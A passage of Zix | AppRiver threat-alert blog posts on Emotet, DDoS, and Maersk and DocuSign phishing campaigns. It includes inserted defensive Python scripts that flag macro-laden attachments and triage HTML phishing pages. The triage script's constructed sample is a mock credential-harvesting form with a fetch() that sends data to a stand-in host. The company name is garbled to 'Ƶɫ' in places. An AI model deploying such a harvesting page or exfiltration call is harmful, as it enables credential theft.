(Source: Zix | AppRiver)</figcaption></figure><p> </p> <p><span><span>Another instance came with the instruction to “Please see attached” as well as the offer of assistance should the recipient need anything more.</span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2021-11/Picture4.jpg" width="1224" height="640" alt="Screenshot of a second Emotet attack email. (Source: Zix | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of a second Emotet attack email. (Source: Zix | AppRiver)</figcaption></figure><p> </p> <p><span><span>This isn’t the first time that malicious actors have used this tactic to distribute Emotet. Back in <a href="/resources/blog/may-2020/emotet-actors-use-conversation-hijacking-attack-deliver-qakbot" rel="nofollow">May 2020</a>, for instance, Zix | AppRiver flagged an email as part of a conversation hijacking attack involving a request for a trade reference and bank reference. Ultimately, the email used a .ZIP archive to deliver Qakbot, a common payload of Emotet.</span></span></p> <p><span><span>All the attack attempts detected by Zix | AppRiver arrived with Microsoft Excel spreadsheets, Microsoft Word documents, or password-protected .ZIP archives containing Word documents. Those files contained malicious macros that, when enabled, dropped Emotet.</span></span></p> <p><span><span>Once those macros ran, Brad Duncan at the <a href="https://isc.sans.edu/forums/diary/Emotet+Returns/28044/" rel="nofollow">SANS Internet Storm Center</a> spotted something familiar in the resulting network traffic.</span></span></p> <p><span><span>“Infection traffic for Emotet is similar to what we saw before the takedown in January 2021,” he explained in a diary post. “The only real difference is Emotet post-infection C2 is now encrypted HTTPS instead of unencrypted HTTP. 
My infected lab host turned into a spambot trying to push out more Emotet malspam.”</span></span></p> <p><span><span>Things didn’t slow down with Emotet after November 15. The following day, Zix | AppRiver detected 1,819 attack attempts involving the botnet. Those instances then fell to 665 on November 17.</span></span></p> <h2><span><span><span><span><span>A Familiar Friend Lent Some Help</span></span></span></span></span></h2> <p><span><span>As a bit of a recap, law enforcement agencies in the Netherlands, Germany, the United States, the United Kingdom, France, Lithuania, Canada, and Ukraine, with international activity coordinated by <a href="https://www.europol.europa.eu/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action" rel="nofollow">Europol</a> and Eurojust, announced the seizure of Emotet’s infrastructure in January 2021. The botnet went quiet for 10 months after that.</span></span></p> <p><span><span>So, how did the botnet come back online?</span></span></p> <p><span><span>Per <a href="https://www.bleepingcomputer.com/news/security/here-are-the-new-emotet-spam-campaigns-hitting-mailboxes-worldwide/" rel="nofollow">Bleeping Computer</a>, “active Trickbot infections began dropping the Emotet loader on already infected devices, rebuilding the botnet for spamming activity” in mid-November.</span></span></p> <p><span><span>Trickbot has an established history with Emotet. Back in <a href="/resources/blog/april-2019/attack-campaign-using-emotet-and-trickbot-deliver-ryuk-ransomware" rel="nofollow">April 2019</a>, security researchers spotted the trojan families working together to infect unsuspecting users with Ryuk ransomware.</span></span></p> <p><span><span>Emotet’s takedown didn’t slow down Trickbot, however. 
On the contrary, <a href="https://www.checkpoint.com/press/2021/october-2021s-most-wanted-malware-trickbot-takes-top-spot-for-fifth-time/" rel="nofollow">Check Point Research</a> wrote in October 2021 that Trickbot had remained at the top of its most wanted malware list for five months straight.</span></span></p> <h2><span><span><span><span><span>How to Respond to Emotet’s Return </span></span></span></span></span></h2> <p><span><span>Emotet’s reemergence highlights the need for organizations to strengthen their security against email-based attacks. One of the ways they can do that is by investing in their email security awareness training program. Through regular education modules, organizations can inform their employees about conversation hijacking and other attack techniques used by spammers.</span></span></p> <p><span><span>Organizations need to balance those human controls with technical security measures. Hence the need for a <a href="/products/email-threat-protection" rel="nofollow">multi-layered email security solution</a>. 
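</span></span></p>
<p>The Emotet attachments described above (Excel and Word files with macros, some inside password-protected .ZIP archives) and the Formbook lures earlier on this page (a Word document, an Excel spreadsheet, a .RAR archive) share a property a gateway can act on before anything is opened. The inspector below is an added example written for this page, not Zix | AppRiver’s code. It flags three things visible by static inspection: an archive entry whose header marks it as encrypted, an OOXML document that ships a VBA project, and a workbook that carries an Excel 4.0 macro sheet; it also looks one level into plain archives. Legacy binary .doc/.xls files and .RAR archives need their own parsers and are only reported, not opened. The sample files are built in memory, and the <code>vbaProject.bin</code> bytes are a placeholder rather than a real macro; because Python’s <code>zipfile</code> cannot write encrypted entries, the “password-protected” sample is produced by setting the encrypted bit in the central directory, which is exactly what the inspector reads.</p>

```python
"""Static checks for macro-bearing Office attachments and locked archives.

Added example, not Zix | AppRiver's code. Sample files are constructed in
memory; the vbaProject.bin content is a placeholder, not a real macro.
"""
import io
import zipfile

OFFICE_EXT = (".doc", ".docm", ".docx", ".dot", ".dotm", ".xls", ".xlsm", ".xlsx", ".xlam")
ZIP_ENCRYPTED = 0x1  # general-purpose flag bit 0 in a ZIP entry header


def inspect_attachment(data):
    """Return a list of findings for one attachment (empty list = nothing seen)."""
    findings = []
    if not data.startswith(b"PK\x03\x04"):
        return findings  # not a ZIP container: .rar, .exe, legacy .doc/.xls need other parsers
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
        names = [i.filename for i in infos]
        if any(i.flag_bits & ZIP_ENCRYPTED for i in infos):
            findings.append("password-protected archive; contents cannot be scanned")
        if "[Content_Types].xml" in names:  # OOXML package (docx/xlsx family)
            if any(n.lower().endswith("vbaproject.bin") for n in names):
                findings.append("Office document carries a VBA project")
            if any(n.lower().startswith("xl/macrosheets/") for n in names):
                findings.append("workbook carries an Excel 4.0 macro sheet")
            return findings
        for i in infos:  # plain archive: look at what it bundles
            if i.flag_bits & ZIP_ENCRYPTED or not i.filename.lower().endswith(OFFICE_EXT):
                continue
            findings.append(f"archive bundles Office document {i.filename}")
            for f in inspect_attachment(zf.read(i)):
                findings.append(f"{i.filename}: {f}")
    return findings


# --- constructed sample files -------------------------------------------------
CONTENT_TYPES = ('<?xml version="1.0" encoding="UTF-8"?>'
                 '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')


def build_ooxml(parts):
    """Minimal OOXML-shaped package: [Content_Types].xml plus the given parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        for name, content in parts.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_archive(inner_name, inner, password_protected=False):
    """Wrap one file in a ZIP. zipfile cannot write encrypted entries, so a
    'password-protected' sample just sets the encrypted bit on the central
    directory entry, which is all infolist() reads back."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(inner_name, inner)
        if password_protected:
            zf.infolist()[0].flag_bits |= ZIP_ENCRYPTED
    return buf.getvalue()


DOCM_WITH_VBA = build_ooxml({"word/document.xml": "<w:document/>",
                             "word/vbaProject.bin": b"\xd0\xcf\x11\xe0 placeholder"})
DOCX_CLEAN = build_ooxml({"word/document.xml": "<w:document/>"})
XLSM_WITH_XLM = build_ooxml({"xl/workbook.xml": "<workbook/>",
                             "xl/macrosheets/sheet1.xml": "<xm:macrosheet/>"})

if __name__ == "__main__":
    samples = {
        "Invoice.docm": DOCM_WITH_VBA,
        "Report.docx": DOCX_CLEAN,
        "Order.xlsm": XLSM_WITH_XLM,
        "Documents.zip": build_archive("Invoice.docm", DOCM_WITH_VBA),
        "Locked.zip": build_archive("Invoice.docm", DOCM_WITH_VBA, password_protected=True),
    }
    for fname, blob in samples.items():
        print(fname, "->", inspect_attachment(blob) or "clean")
```

<p>The locked-archive finding is the important one for the Emotet campaign: a gateway that cannot open the archive cannot scan the document inside, so the sensible policy is to quarantine or detonate password-protected archives rather than pass them through as “unscannable, therefore clean.” The macro checks catch the OOXML cases; the legacy binary formats and .RAR still need a dedicated parser or a sandbox.</p>
<p><span><span>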
By scanning emails for malicious IPs and other threat indicators, organizations can automatically protect themselves against many email-based attacks—all while allowing legitimate correspondence to reach its intended destination.</span></span></p> Tue, 23 Nov 2021 21:13:33 +0000 admin 491 at Record-Setting DDoS Attack Highlights Malicious Actors’ Strategic Thinking /resources/blog/november-2021/record-setting-ddos-attack-highlights-malicious-actors-strategic <span>Record-Setting DDoS Attack Highlights Malicious Actors’ Strategic Thinking</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Tue, 11/09/2021 - 17:36</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/5" hreflang="en">David Bisson</a> <article><img src="/sites/default/files/2021-11/ddos.jpg" width="1400" height="700" alt="" loading="lazy" typeof="foaf:Image" /></article><p><span><span>In mid-October, Microsoft revealed that it had succeeded in mitigating a 2.4 terabits-per-second (Tbps) distributed denial-of-service (DDoS) attack against its Azure infrastructure.</span></span></p> <p><span><span>The tech giant explained that the attack targeted an Azure customer in Europe back in August and that it lasted for over 10 minutes. During that period, traffic peaked briefly at 2.4 Tbps. Microsoft documented two smaller bursts, at 0.55 Tbps and 1.7 Tbps, after that, as reported by <a href="https://www.msn.com/en-us/money/other/microsoft-says-it-mitigated-the-largest-ddos-attack-ever-recorded/ar-AAPpIWb" rel="nofollow">MSN</a>.</span></span></p> <h1><span><span><span><span><span>What Is a DDoS Attack?</span></span></span></span></span></h1> <p><span><span>A DDoS attack is an operation in which malicious actors use many distributed hosts, typically a botnet of compromised devices, to overwhelm an organization’s online presence. 
It works by flooding a target’s websites and other public-facing infrastructure with more traffic (HTTP requests, connection attempts or raw packets) than it can absorb. This prevents legitimate users from accessing those resources, thereby disrupting the target’s business operations.</span></span></p> <p><span><span>What makes DDoS attacks effective is that they turn the normal functionality of networking equipment and services, such as routers, against the target. The <a href="https://www.comptia.org/content/guides/what-is-a-ddos-attack-how-it-works" rel="nofollow">Computing Technology Industry Association</a> (CompTIA) explains how.</span></span></p> <p><span><span>“Sophisticated DDoS attacks don’t necessarily have to take advantage of default settings or open relays,” the trade association explained. “They exploit normal behavior and take advantage of how the protocols that run on today’s devices were designed to run in the first place. In the same way that a social engineer manipulates the default workings of human communication, a DDoS attacker manipulates the normal workings of the network services we all rely upon and trust.”</span></span></p> <p><span><span>These types of events aren’t rare—especially not this year. According to <a href="https://venturebeat.com/2021/10/06/atlas-vpn-ddos-attacks-expected-to-reach-11m-by-end-of-2021/" rel="nofollow">VentureBeat</a>, security researchers documented 972,000 DDoS attacks in January 2021, more than in any other month on record. By June, the monthly volume had dropped to 759,000. Even so, DDoS attacks rose 11% in the first half of 2021 compared to H1 2020, to 5.4 million in total. VentureBeat went on to note that DDoS attacks could reach a record-setting 11 million by December if the H1 2021 trend continues for the rest of the year.</span></span></p> <h1><span><span><span><span><span>Putting DDoS Attacks into Context</span></span></span></span></span></h1> <p><span><span>DDoS attacks can be standalone incidents. 
But they don’t have to be. Take email bombs, for example. An email bomb floods an inbox with a high volume of messages. Those messages aren’t themselves malicious; they don’t contain embedded links or attachments that carry malware or redirect victims to a phishing page. But they do serve an important function for attackers.</span></span></p> <p><span><span>David Pickett, senior cybersecurity analyst at <a href="https://appriver.com/blog/email-bombs-disguise-fraudulent-activity" rel="nofollow">AppRiver</a>, explains how.</span></span></p> <p><span><span>“The bomb is typically designed to distract the user from emails generated due to fraudulent purchases or financial account updates or transactions,” Pickett pointed out. “During these types of attacks, we've observed fraudulent airline ticket purchases, Apple store orders, and quite a few Best Buy pickup orders. If applicable to the fraudulent purchase - such as a Best Buy pickup order - attackers have mules ready to quickly pick up the fraudulently purchased merchandise soon after the attack begins.”</span></span></p> <p><span><span>Digital fraudsters aren’t the only ones who have been known to use DDoS attacks as part of their operations. According to <a href="https://www.bleepingcomputer.com/news/security/fbi-hellokitty-ransomware-adds-ddos-attacks-to-extortion-tactics/" rel="nofollow">Bleeping Computer</a>, the HelloKitty ransomware gang began leveraging DDoS attacks as another extortion tactic in the beginning of November. 
This involves targeting an organization’s public-facing website with a DDoS attack if the victim doesn’t respond quickly enough or doesn’t pay the demanded ransom.</span></span></p> <h1><span><span><span><span><span>How to Defend Against DDoS Attacks</span></span></span></span></span></h1> <p><span><span>In its documentation, <a href="https://docs.microsoft.com/en-us/compliance/assurance/assurance-microsoft-dos-defense-strategy" rel="nofollow">Microsoft</a> explains that it uses its global presence and engagement with Internet providers, private corporations, and other security firms to defend against network-based DDoS attacks. Those partners include Ƶɫ, which complements Microsoft’s focus on productivity and performance with email threat protection. Click <a href="/amplify/smb/" rel="nofollow">here</a> to learn more about how this layered security approach can help to defend your organization against DDoS attacks and other threats.</span></span></p> Tue, 09 Nov 2021 23:36:05 +0000 admin 486 at Phishers Impersonating Maersk Line to Steal Victims’ Email Credentials /resources/blog/november-2021/phishers-impersonating-maersk-line-steal-victims-email-credentials <span>Phishers Impersonating Maersk Line to Steal Victims’ Email Credentials</span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Tue, 11/02/2021 - 11:08</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/5" hreflang="en">David Bisson</a> <article><img src="/sites/default/files/2021-11/maersk_2.jpg" width="1485" height="805" alt="Screenshot of the phishing landing page. (Source: Ƶɫ | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><p><span><span>Phishers launched an attack campaign in which they impersonated Danish international container shipping company Maersk Line to steal victims’ email account credentials.</span></span></p> <h2><span><span><span><span><span>“Confirmation of Shipping Invoice” Scam</span></span></span></span></span></h2> <p><span><span>At the end of October, the Ƶɫ | AppRiver team flagged an email that appeared to have originated from Maersk Line.</span></span></p> <p><span><span>Those responsible for the campaign used stolen branding to impersonate the shipping giant. They even included the text “Best Global shipping company” in their message. As noted by <a href="https://www.fleetmon.com/maritime-news/2013/1535/maersk-line-won-two-awards-afsca-2013/" rel="nofollow">FleetMon</a>, Maersk Line won this exact distinction for at least 20 consecutive years at the Asian Freight & Supply Chain Awards (AFSCA).</span></span></p> <p><span><span>Even so, the attackers slipped up a few times in their email. </span></span></p> <p><span><span>First, they used inconsistent capitalization with “Best Global shipping company,” “Original copy of Shipping Docs,” and even the subject line “Confirmation of shipping Invoice,BL & Parking List [sic].” These errors might have raised a recipient’s suspicions.</span></span></p> <p><span><span>Second, they set the display name to “Maersk Global Shipping” while sending from the address “noreply@maersklineshipping[dot]com,” a lookalike domain. That’s not a legitimate Maersk Line email address: official correspondence from the shipping giant uses the domain “@maersk.com.”</span></span></p> <p><span><span>Finally, the attackers included a signature block attributing their email to Mark Rosario of MaerskLine China. There appears to be a Mark Rosario who does work at Maersk. 
But according to this individual’s LinkedIn profile, he’s been associated with the company’s operations in Pakistan for over 20 years, not China.</span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2021-11/maersk_1.jpg" width="1040" height="917" alt="Screenshot of the fake Maersk Line email. (Source: Ƶɫ | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of the fake Maersk Line email. (Source: Ƶɫ | AppRiver)</figcaption></figure><p> </p> <p><span><span>The email instructed the recipient to view the original documents (an invoice, a bill of lading, and a packing list) by clicking on an embedded “Download Confirmation” button.</span></span></p> <p><span><span>Troy Gill, manager of security research at Ƶɫ | AppRiver, explains what happened next.</span></span></p> <p><span><span><span>“If the user complies, they are directed to a very convincing phishing page located on labour.go[.]th,” he said. “The page cycles through different realistic-looking Maersk backgrounds with a sign-in screen overlaid to steal the user’s email credentials.”</span></span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2021-11/maersk_2.jpg" width="1485" height="805" alt="Screenshot of the phishing landing page. (Source: Ƶɫ | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of the phishing landing page. (Source: Ƶɫ | AppRiver)</figcaption></figure><p> </p> <p><span><span><span>“Per whois DNS data, the domain itself appears to be a Thai government page managed by the Labour Protection and Welfare Department. 
We were also able to find that it has a history of over 3 years of being abused for phishing attacks, mostly Adobe-themed in the past,” he added.</span></span></span></p> <h2><span><span><span><span><span>Putting This Attack into Context</span></span></span></span></span></h2> <p><span><span>The attack described above arrived amid ongoing global supply chain challenges caused by the pandemic. In June 2021, for instance, <a href="https://www.whitehouse.gov/cea/blog/2021/06/17/why-the-pandemic-has-disrupted-supply-chains/" rel="nofollow">The White House</a> explained that some industries had shrunk or closed in response to the events of 2020. Some businesses struggled to hire quickly enough as they tried to reopen, while others didn’t have enough inventory to immediately resume their previous levels of business activity.</span></span></p> <p><span><span>These events help to explain why 36% of small businesses reported delays with domestic suppliers, according to a U.S. Census Small Business Pulse survey cited by The White House. They also help to put other events such as abrupt price increases, shortages, and digital attack campaigns impersonating shipping companies into perspective.</span></span></p> <p><span><span>“With so many shipping delays and supply shortages around the world, threat actors are eager to spoof logistics and supply chain companies hoping for an easy compromise,” Gill explained.</span></span></p> <p><span><span>Attacks such as the one discussed above didn’t begin with the pandemic, however. Back in May 2019, for example, <a href="https://www.maersk.com/news/articles/2019/05/16/maersk-employees-impersonated-in-phishing-scam" rel="nofollow">Maersk</a> published an article warning of a phishing scam where fraudsters used genuine Maersk employee names and positions when contacting customers to trick them into clicking on a link, downloading an attachment, and/or authenticating their information. 
</span></span></p> <p><span><span>Such activity highlights the need for organizations to invest in both employee security awareness training and an <a href="/products/email-threat-protection" rel="nofollow">email security solution</a> capable of spotting new attack attempts.</span></span></p> Tue, 02 Nov 2021 16:08:28 +0000 admin 483 at DocuSign Abused by Phishers to Target Victims’ Email Account Credentials /resources/blog/october-2021/docusign-abused-phishers-target-victims-email-account-credentials <span>DocuSign Abused by Phishers to Target Victims’ Email Account Credentials </span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Tue, 10/19/2021 - 17:21</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/5" hreflang="en">David Bisson</a> <article><img src="/sites/default/files/2021-10/docusign_3.png" width="974" height="433" alt="Screenshot of the credential harvesting page. (Source: Ƶɫ | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><p><span><span>Digital attackers launched a phishing campaign in which they abused DocuSign to steal victims’ email account credentials.</span></span></p> <h1><span><span><span><span><span>The Latest Living Off the Land Phishing Example</span></span></span></span></span></h1> <p><span><span>At the end of September, the Ƶɫ | AppRiver team flagged an email that arrived with the subject line “Please DocuSign: Proposal Shared Document Online.pdf.”</span></span></p> <p><span><span>The screenshot below reveals that the attack email genuinely originated from DocuSign’s infrastructure. Like other notifications sent out by the service, the email listed one of DocuSign’s North American Services (“DocuSign NA4 System”) as the sender. 
It also came from the legitimate sender email address “dse_NA4@docusign.net” that DocuSign uses for official correspondence, so sender reputation and authentication checks would have passed.</span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2021-10/docusign_1.png" width="946" height="634" alt="Screenshot of the attack email. (Source: Ƶɫ | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of the attack email. (Source: Ƶɫ | AppRiver)</figcaption></figure><p> </p> <p><span><span>The body of the email appeared to be an invitation from one Arthur Frank of “Adf Law” for the recipient to review a document. As you can see from the broken grammar used by Arthur in his note to the recipient, something phishy was going on with this email.</span></span></p> <p><span><span>“Attached you will find revised document from Adf Law,” the attackers said in the email. “Document is Microsoft protected therefore download to access the original file and advise.”</span></span></p> <p><span><span>Clicking on the “Review Document” button redirected the victim to an HTML file hosted on DocuSign’s servers. </span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2021-10/docusign_2.png" width="975" height="397" alt="Screenshot of the fake Adobe Document download prompt. (Source: Ƶɫ | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of the fake Adobe Document download prompt. (Source: Ƶɫ | AppRiver)</figcaption></figure><p> </p> <p><span><span>Once downloaded and opened, the HTML file rendered a credential harvesting page in the victim’s browser. It prompted the victim to sign in with Outlook, Office 365, or another email account, supposedly to read a document hosted in Adobe Document Cloud. Because the file is served from DocuSign and opened locally, neither the sender’s reputation nor a URL scan of the email body exposes the phishing page; the attachment itself has to be inspected.</span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2021-10/docusign_3.png" width="974" height="433" alt="Screenshot of the credential harvesting page. 
(Source: Ƶɫ | AppRiver)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of the credential harvesting page. (Source: Ƶɫ | AppRiver)</figcaption></figure><p> </p> <h1><span><span><span><span><span>Other Phishing Attempts Involving DocuSign </span></span></span></span></span></h1> <p><span><span>This isn’t the first time that digital attackers have abused DocuSign to conduct a phishing campaign. Back in August, for instance, news emerged of a campaign in which phishers leveraged DocuSign to host malicious links despite the service’s ongoing efforts to prevent such abuse. <a href="https://www.techradar.com/news/docusign-abused-to-launch-devious-phishing-scams" rel="nofollow">TechRadar</a> pointed out that digital attackers could use steganography within a hosted file to deliver threats like malware or ransomware past those preventative measures. They could also use document types like PDFs to preserve embedded hyperlinks’ clickability—all while evading security checks employed by DocuSign and third-party email security solutions.</span></span></p> <p><span><span>A few weeks later, <a href="https://www.docusign.com/trust/alerts/alert-new-phishing-campaign-observed-2" rel="nofollow">DocuSign itself</a> revealed it had observed a “new phishing campaign in which malicious URLs are being hidden in legitimate DocuSign envelopes.” That campaign used various senders and email addresses to send out the attack emails, which arrived with subject lines such as “Important: Microsoft Email Maintenance Request,” “Bank Confirmation,” and “INVOICE.pdf.”</span></span></p> <h1><span><span><span><span><span>How to Defend Against Phishers Abusing DocuSign</span></span></span></span></span></h1> <p><span><span>The attack campaigns described above highlight the need for organizations to defend against phishers using <a href="/resources/blog/march-2019/separ-malware-preying-businesses-using-living-land-tactics" rel="nofollow">Living off the Land (LOTL) tactics</a> to abuse DocuSign and other legitimate services. One of the ways they can do that is by using security awareness training to cultivate their employees’ suspicion of unexpected emails containing unknown attachments. At the same time, they need to foster a culture where reporting these types of emails is encouraged rather than overlooked or dismissed.</span></span></p> <p><span><span>Simultaneously, organizations need to augment their technical capacity to defend against these types of emails. They can do so by investing in an email security solution that analyzes incoming messages on multiple levels including IP addresses, campaign patterns, and malware signatures. This analysis should occur in real time so that legitimate correspondence can reach its intended business destination without delay.</span></span></p> <p><span><span><a href="/products/email-threat-protection" rel="nofollow">Learn how Ƶɫ | AppRiver can help to protect your organization against phishers leveraging LOTL techniques</a>. 
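The HTML attachment in the DocuSign campaign above is the part an email gateway never sees rendered: it is served from DocuSign, opened locally, and only then shows a sign-in form. The following added example (not code from the original post, from DocuSign or from Ƶɫ | AppRiver) is a small triage script for such an attachment. It parses the file, finds any form that carries a password field, checks where that form and any inline script would send data, and lists the lure words present. The sample HTML, the placeholder host login-verify.example and the trusted_hosts parameter are constructed for the example; the verdict logic is this script's own, not a DocuSign feature.

```python
"""Triage an HTML email attachment for the credential-harvesting pattern above:
a sign-in form with a password field that submits to a host outside the sender's
own, plus any inline script that talks to an external URL. Standard library only."""
from __future__ import annotations

import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Lure words the post mentions (Outlook / Office365 / Adobe Document Cloud) plus the
# generic sign-in vocabulary such pages use. Hits are informational, not a verdict.
LURE_TERMS = ("outlook", "office365", "office 365", "adobe", "docusign", "sign in", "password")


class FormFinder(HTMLParser):
    """Collect every <form> with its action and whether it has a password field,
    every inline <script> body, and the visible text."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: list[dict] = []
        self.scripts: list[str] = []
        self.text: list[str] = []
        self._form: dict | None = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # boolean attributes arrive as None
        if tag == "form":
            self._form = {"action": a.get("action", ""), "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if a.get("type", "").lower() == "password":
                self._form["has_password"] = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        (self.scripts if self._in_script else self.text).append(data)


def triage_html(html: str, trusted_hosts: tuple[str, ...] = ()) -> dict:
    """Return where password forms post, which URLs inline scripts reference, which
    lure terms appear, and a verdict. A password form posting anywhere other than a
    host in trusted_hosts (or nowhere absolute at all) is treated as suspicious."""
    p = FormFinder()
    p.feed(html)
    p.close()
    external = []
    for f in p.forms:
        if not f["has_password"]:
            continue
        host = urlsplit(f["action"]).hostname
        # An absolute action pointing off-host is the exfil target; a relative action
        # in a locally opened file would post to file:// and is just as odd.
        if host is None or host not in trusted_hosts:
            external.append(host or "(relative)")
    script_urls = sorted({u for s in p.scripts for u in re.findall(r"https?://[^\s'\"<>]+", s)})
    visible = " ".join(p.text).lower()
    lures = sorted(t for t in LURE_TERMS if t in visible)
    return {
        "external_password_forms": external,
        "script_urls": script_urls,
        "lure_terms": lures,
        "verdict": "suspicious" if external or script_urls else "clean",
    }


# Constructed sample attachment modelled on the Adobe/Outlook lure described above.
# login-verify.example is a placeholder (.example is reserved), not a real indicator.
SAMPLE_PHISH_HTML = """<html><body>
<h2>Adobe Document Cloud</h2>
<p>Sign in with your Outlook, Office365 or other email provider to view the document.</p>
<form method="post" action="https://login-verify.example/office/post.php">
  <input type="email" name="email">
  <input type="password" name="pass">
  <button type="submit">View Document</button>
</form>
<script>fetch("https://login-verify.example/collect.php", {method: "POST"});</script>
</body></html>"""

# Constructed benign counterpart: the only password form posts to the expected host.
SAMPLE_BENIGN_HTML = """<html><body><form action="https://account.docusign.com/login">
<input type="email" name="email"><input type="password" name="pw"></form></body></html>"""

if __name__ == "__main__":
    print(triage_html(SAMPLE_PHISH_HTML, trusted_hosts=("docusign.net", "docusign.com")))
    print(triage_html(SAMPLE_BENIGN_HTML, trusted_hosts=("account.docusign.com",)))
```

The check deliberately keys on where credentials go rather than on branding, because the lure text changes from campaign to campaign while the password field and its off-host destination do not. Obfuscated kits that build the form with JavaScript will not expose an action attribute to a static parser; for those, the script_urls list is the signal to chase.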
</span></span></p> Tue, 19 Oct 2021 22:21:39 +0000 admin 475 at BulletProofLink Phishing-as-a-Service Came with 100+ Built-in Templates /resources/blog/october-2021/bulletprooflink-phishing-service-came-100-built-templates <span>BulletProofLink Phishing-as-a-Service Came with 100+ Built-in Templates </span> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">admin</span></span> <span>Tue, 10/12/2021 - 14:57</span> <a href="/resources/blog/threat-alert" hreflang="en">Threat Alert</a> <a href="/taxonomy/term/5" hreflang="en">David Bisson</a> <article><img src="/sites/default/files/2021-10/phishing_laptop_graphic.jpg" width="1400" height="700" alt="" loading="lazy" typeof="foaf:Image" /></article><p><span><span>A new phishing-as-a-service (PhaaS) operation called “BulletProofLink” provides customers with over 100 templates mimicking popular brands and services.</span></span></p> <h2><span><span><span><span><span>An Overview of How PhaaS Works</span></span></span></span></span></h2> <p><span><span>PhaaS functions like <a href="/resources/blog/july-2021/raas-what-it-and-why-it-making-ransomware-more-prevalent" rel="nofollow">Ransomware-as-a-Service</a> in that it follows the software-as-a-service model. Per <a href="https://www.microsoft.com/security/blog/2021/09/21/catching-the-big-fish-analyzing-a-large-scale-phishing-as-a-service-operation/" rel="nofollow">Microsoft</a>, PhaaS groups provide template creation, hosting, and orchestration capabilities to their customers. These offerings lower the barrier of entry for someone looking to launch their own phishing campaigns. </span></span></p> <p><span><span>Not all digital crime services are the same, however. RaaS operations enable attackers to access victims’ devices, but PhaaS schemes don’t. 
The latter only provide customers with untested credentials stolen from their victims.</span></span></p> <h2><span><span><span><span><span>Analyzing BulletProofLink’s Functionality</span></span></span></span></span></h2> <p><span><span>Microsoft reviewed the templates, services, and pricing structure offered by the BulletProofLink group. In the process, it found that the operation’s infrastructure included multiple sites maintained under several aliases such as “BulletProftLink.” Those sites included YouTube and Vimeo pages offering instructional ads. The group’s infrastructure also included an online store that customers could use to register an account and sign up for a monthly subscription.</span></span></p> <p><span><span>As you can see below, BulletProofLink went so far as to offer a 10% discount to new customers. </span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2021-10/bulletproof_1.png" width="978" height="631" alt="Screenshot of the BulletProofLink’s 10% welcome discount. (Source: Microsoft)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of the BulletProofLink’s 10% welcome discount. (Source: Microsoft)</figcaption></figure><p> </p> <p><span><span>In its analysis of the operation, Microsoft found that BulletProofLink came with over 100 phishing templates for mimicking trusted entities such as mobile service providers, bank holding companies, international shipping organizations, electronic document services, and tech giants.</span></span></p> <p><span><span>Whoever designed the operation’s templates built them to evade detection by traditional security tools. 
Even so, they weren’t completely undetectable.</span></span></p> <p><span><span>“… [T]he campaigns themselves can be identified with a mixture of phishing page source code, combined with the PHP password processing sites referenced therein, as well as the hosting infrastructure used in their larger-scale campaigns,” Microsoft clarified in its analysis. “These password-processing domains correlate back to the operator through hosting, registration, email, and other metadata similarities during domain registration.”</span></span></p> <p><span><span>The Redmond-based company also found that BulletProofLink offered its customers various hosting options and tiers of support. A full PhaaS setup cost as much as $800 a month, for instance, while a one-time hosting link cost approximately $50. Customers with questions could reach BulletProofLink’s operators through Skype, ICQ, forums, and chat rooms. </span></span></p> <h2><span><span><span><span><span>Analyzing a Campaign Created Using BulletProofLink</span></span></span></span></span></h2> <p><span><span>Microsoft examined one campaign that used the BulletProofLink phishing kit. It found that the attack used Microsoft’s own logo and branding to convince the recipient that their password had expired. It then informed the recipient that they could change their password or continue using their current password by clicking on a hyperlinked “Keep Active Password” button.</span></span></p> <p> </p> <figure role="group" class="align-center"><article><img src="/sites/default/files/2021-10/bulletproof_2.png" width="631" height="310" alt="Screenshot of the Microsoft impersonation email. (Source: Microsoft)" loading="lazy" typeof="foaf:Image" /></article><figcaption>Screenshot of the Microsoft impersonation email. 
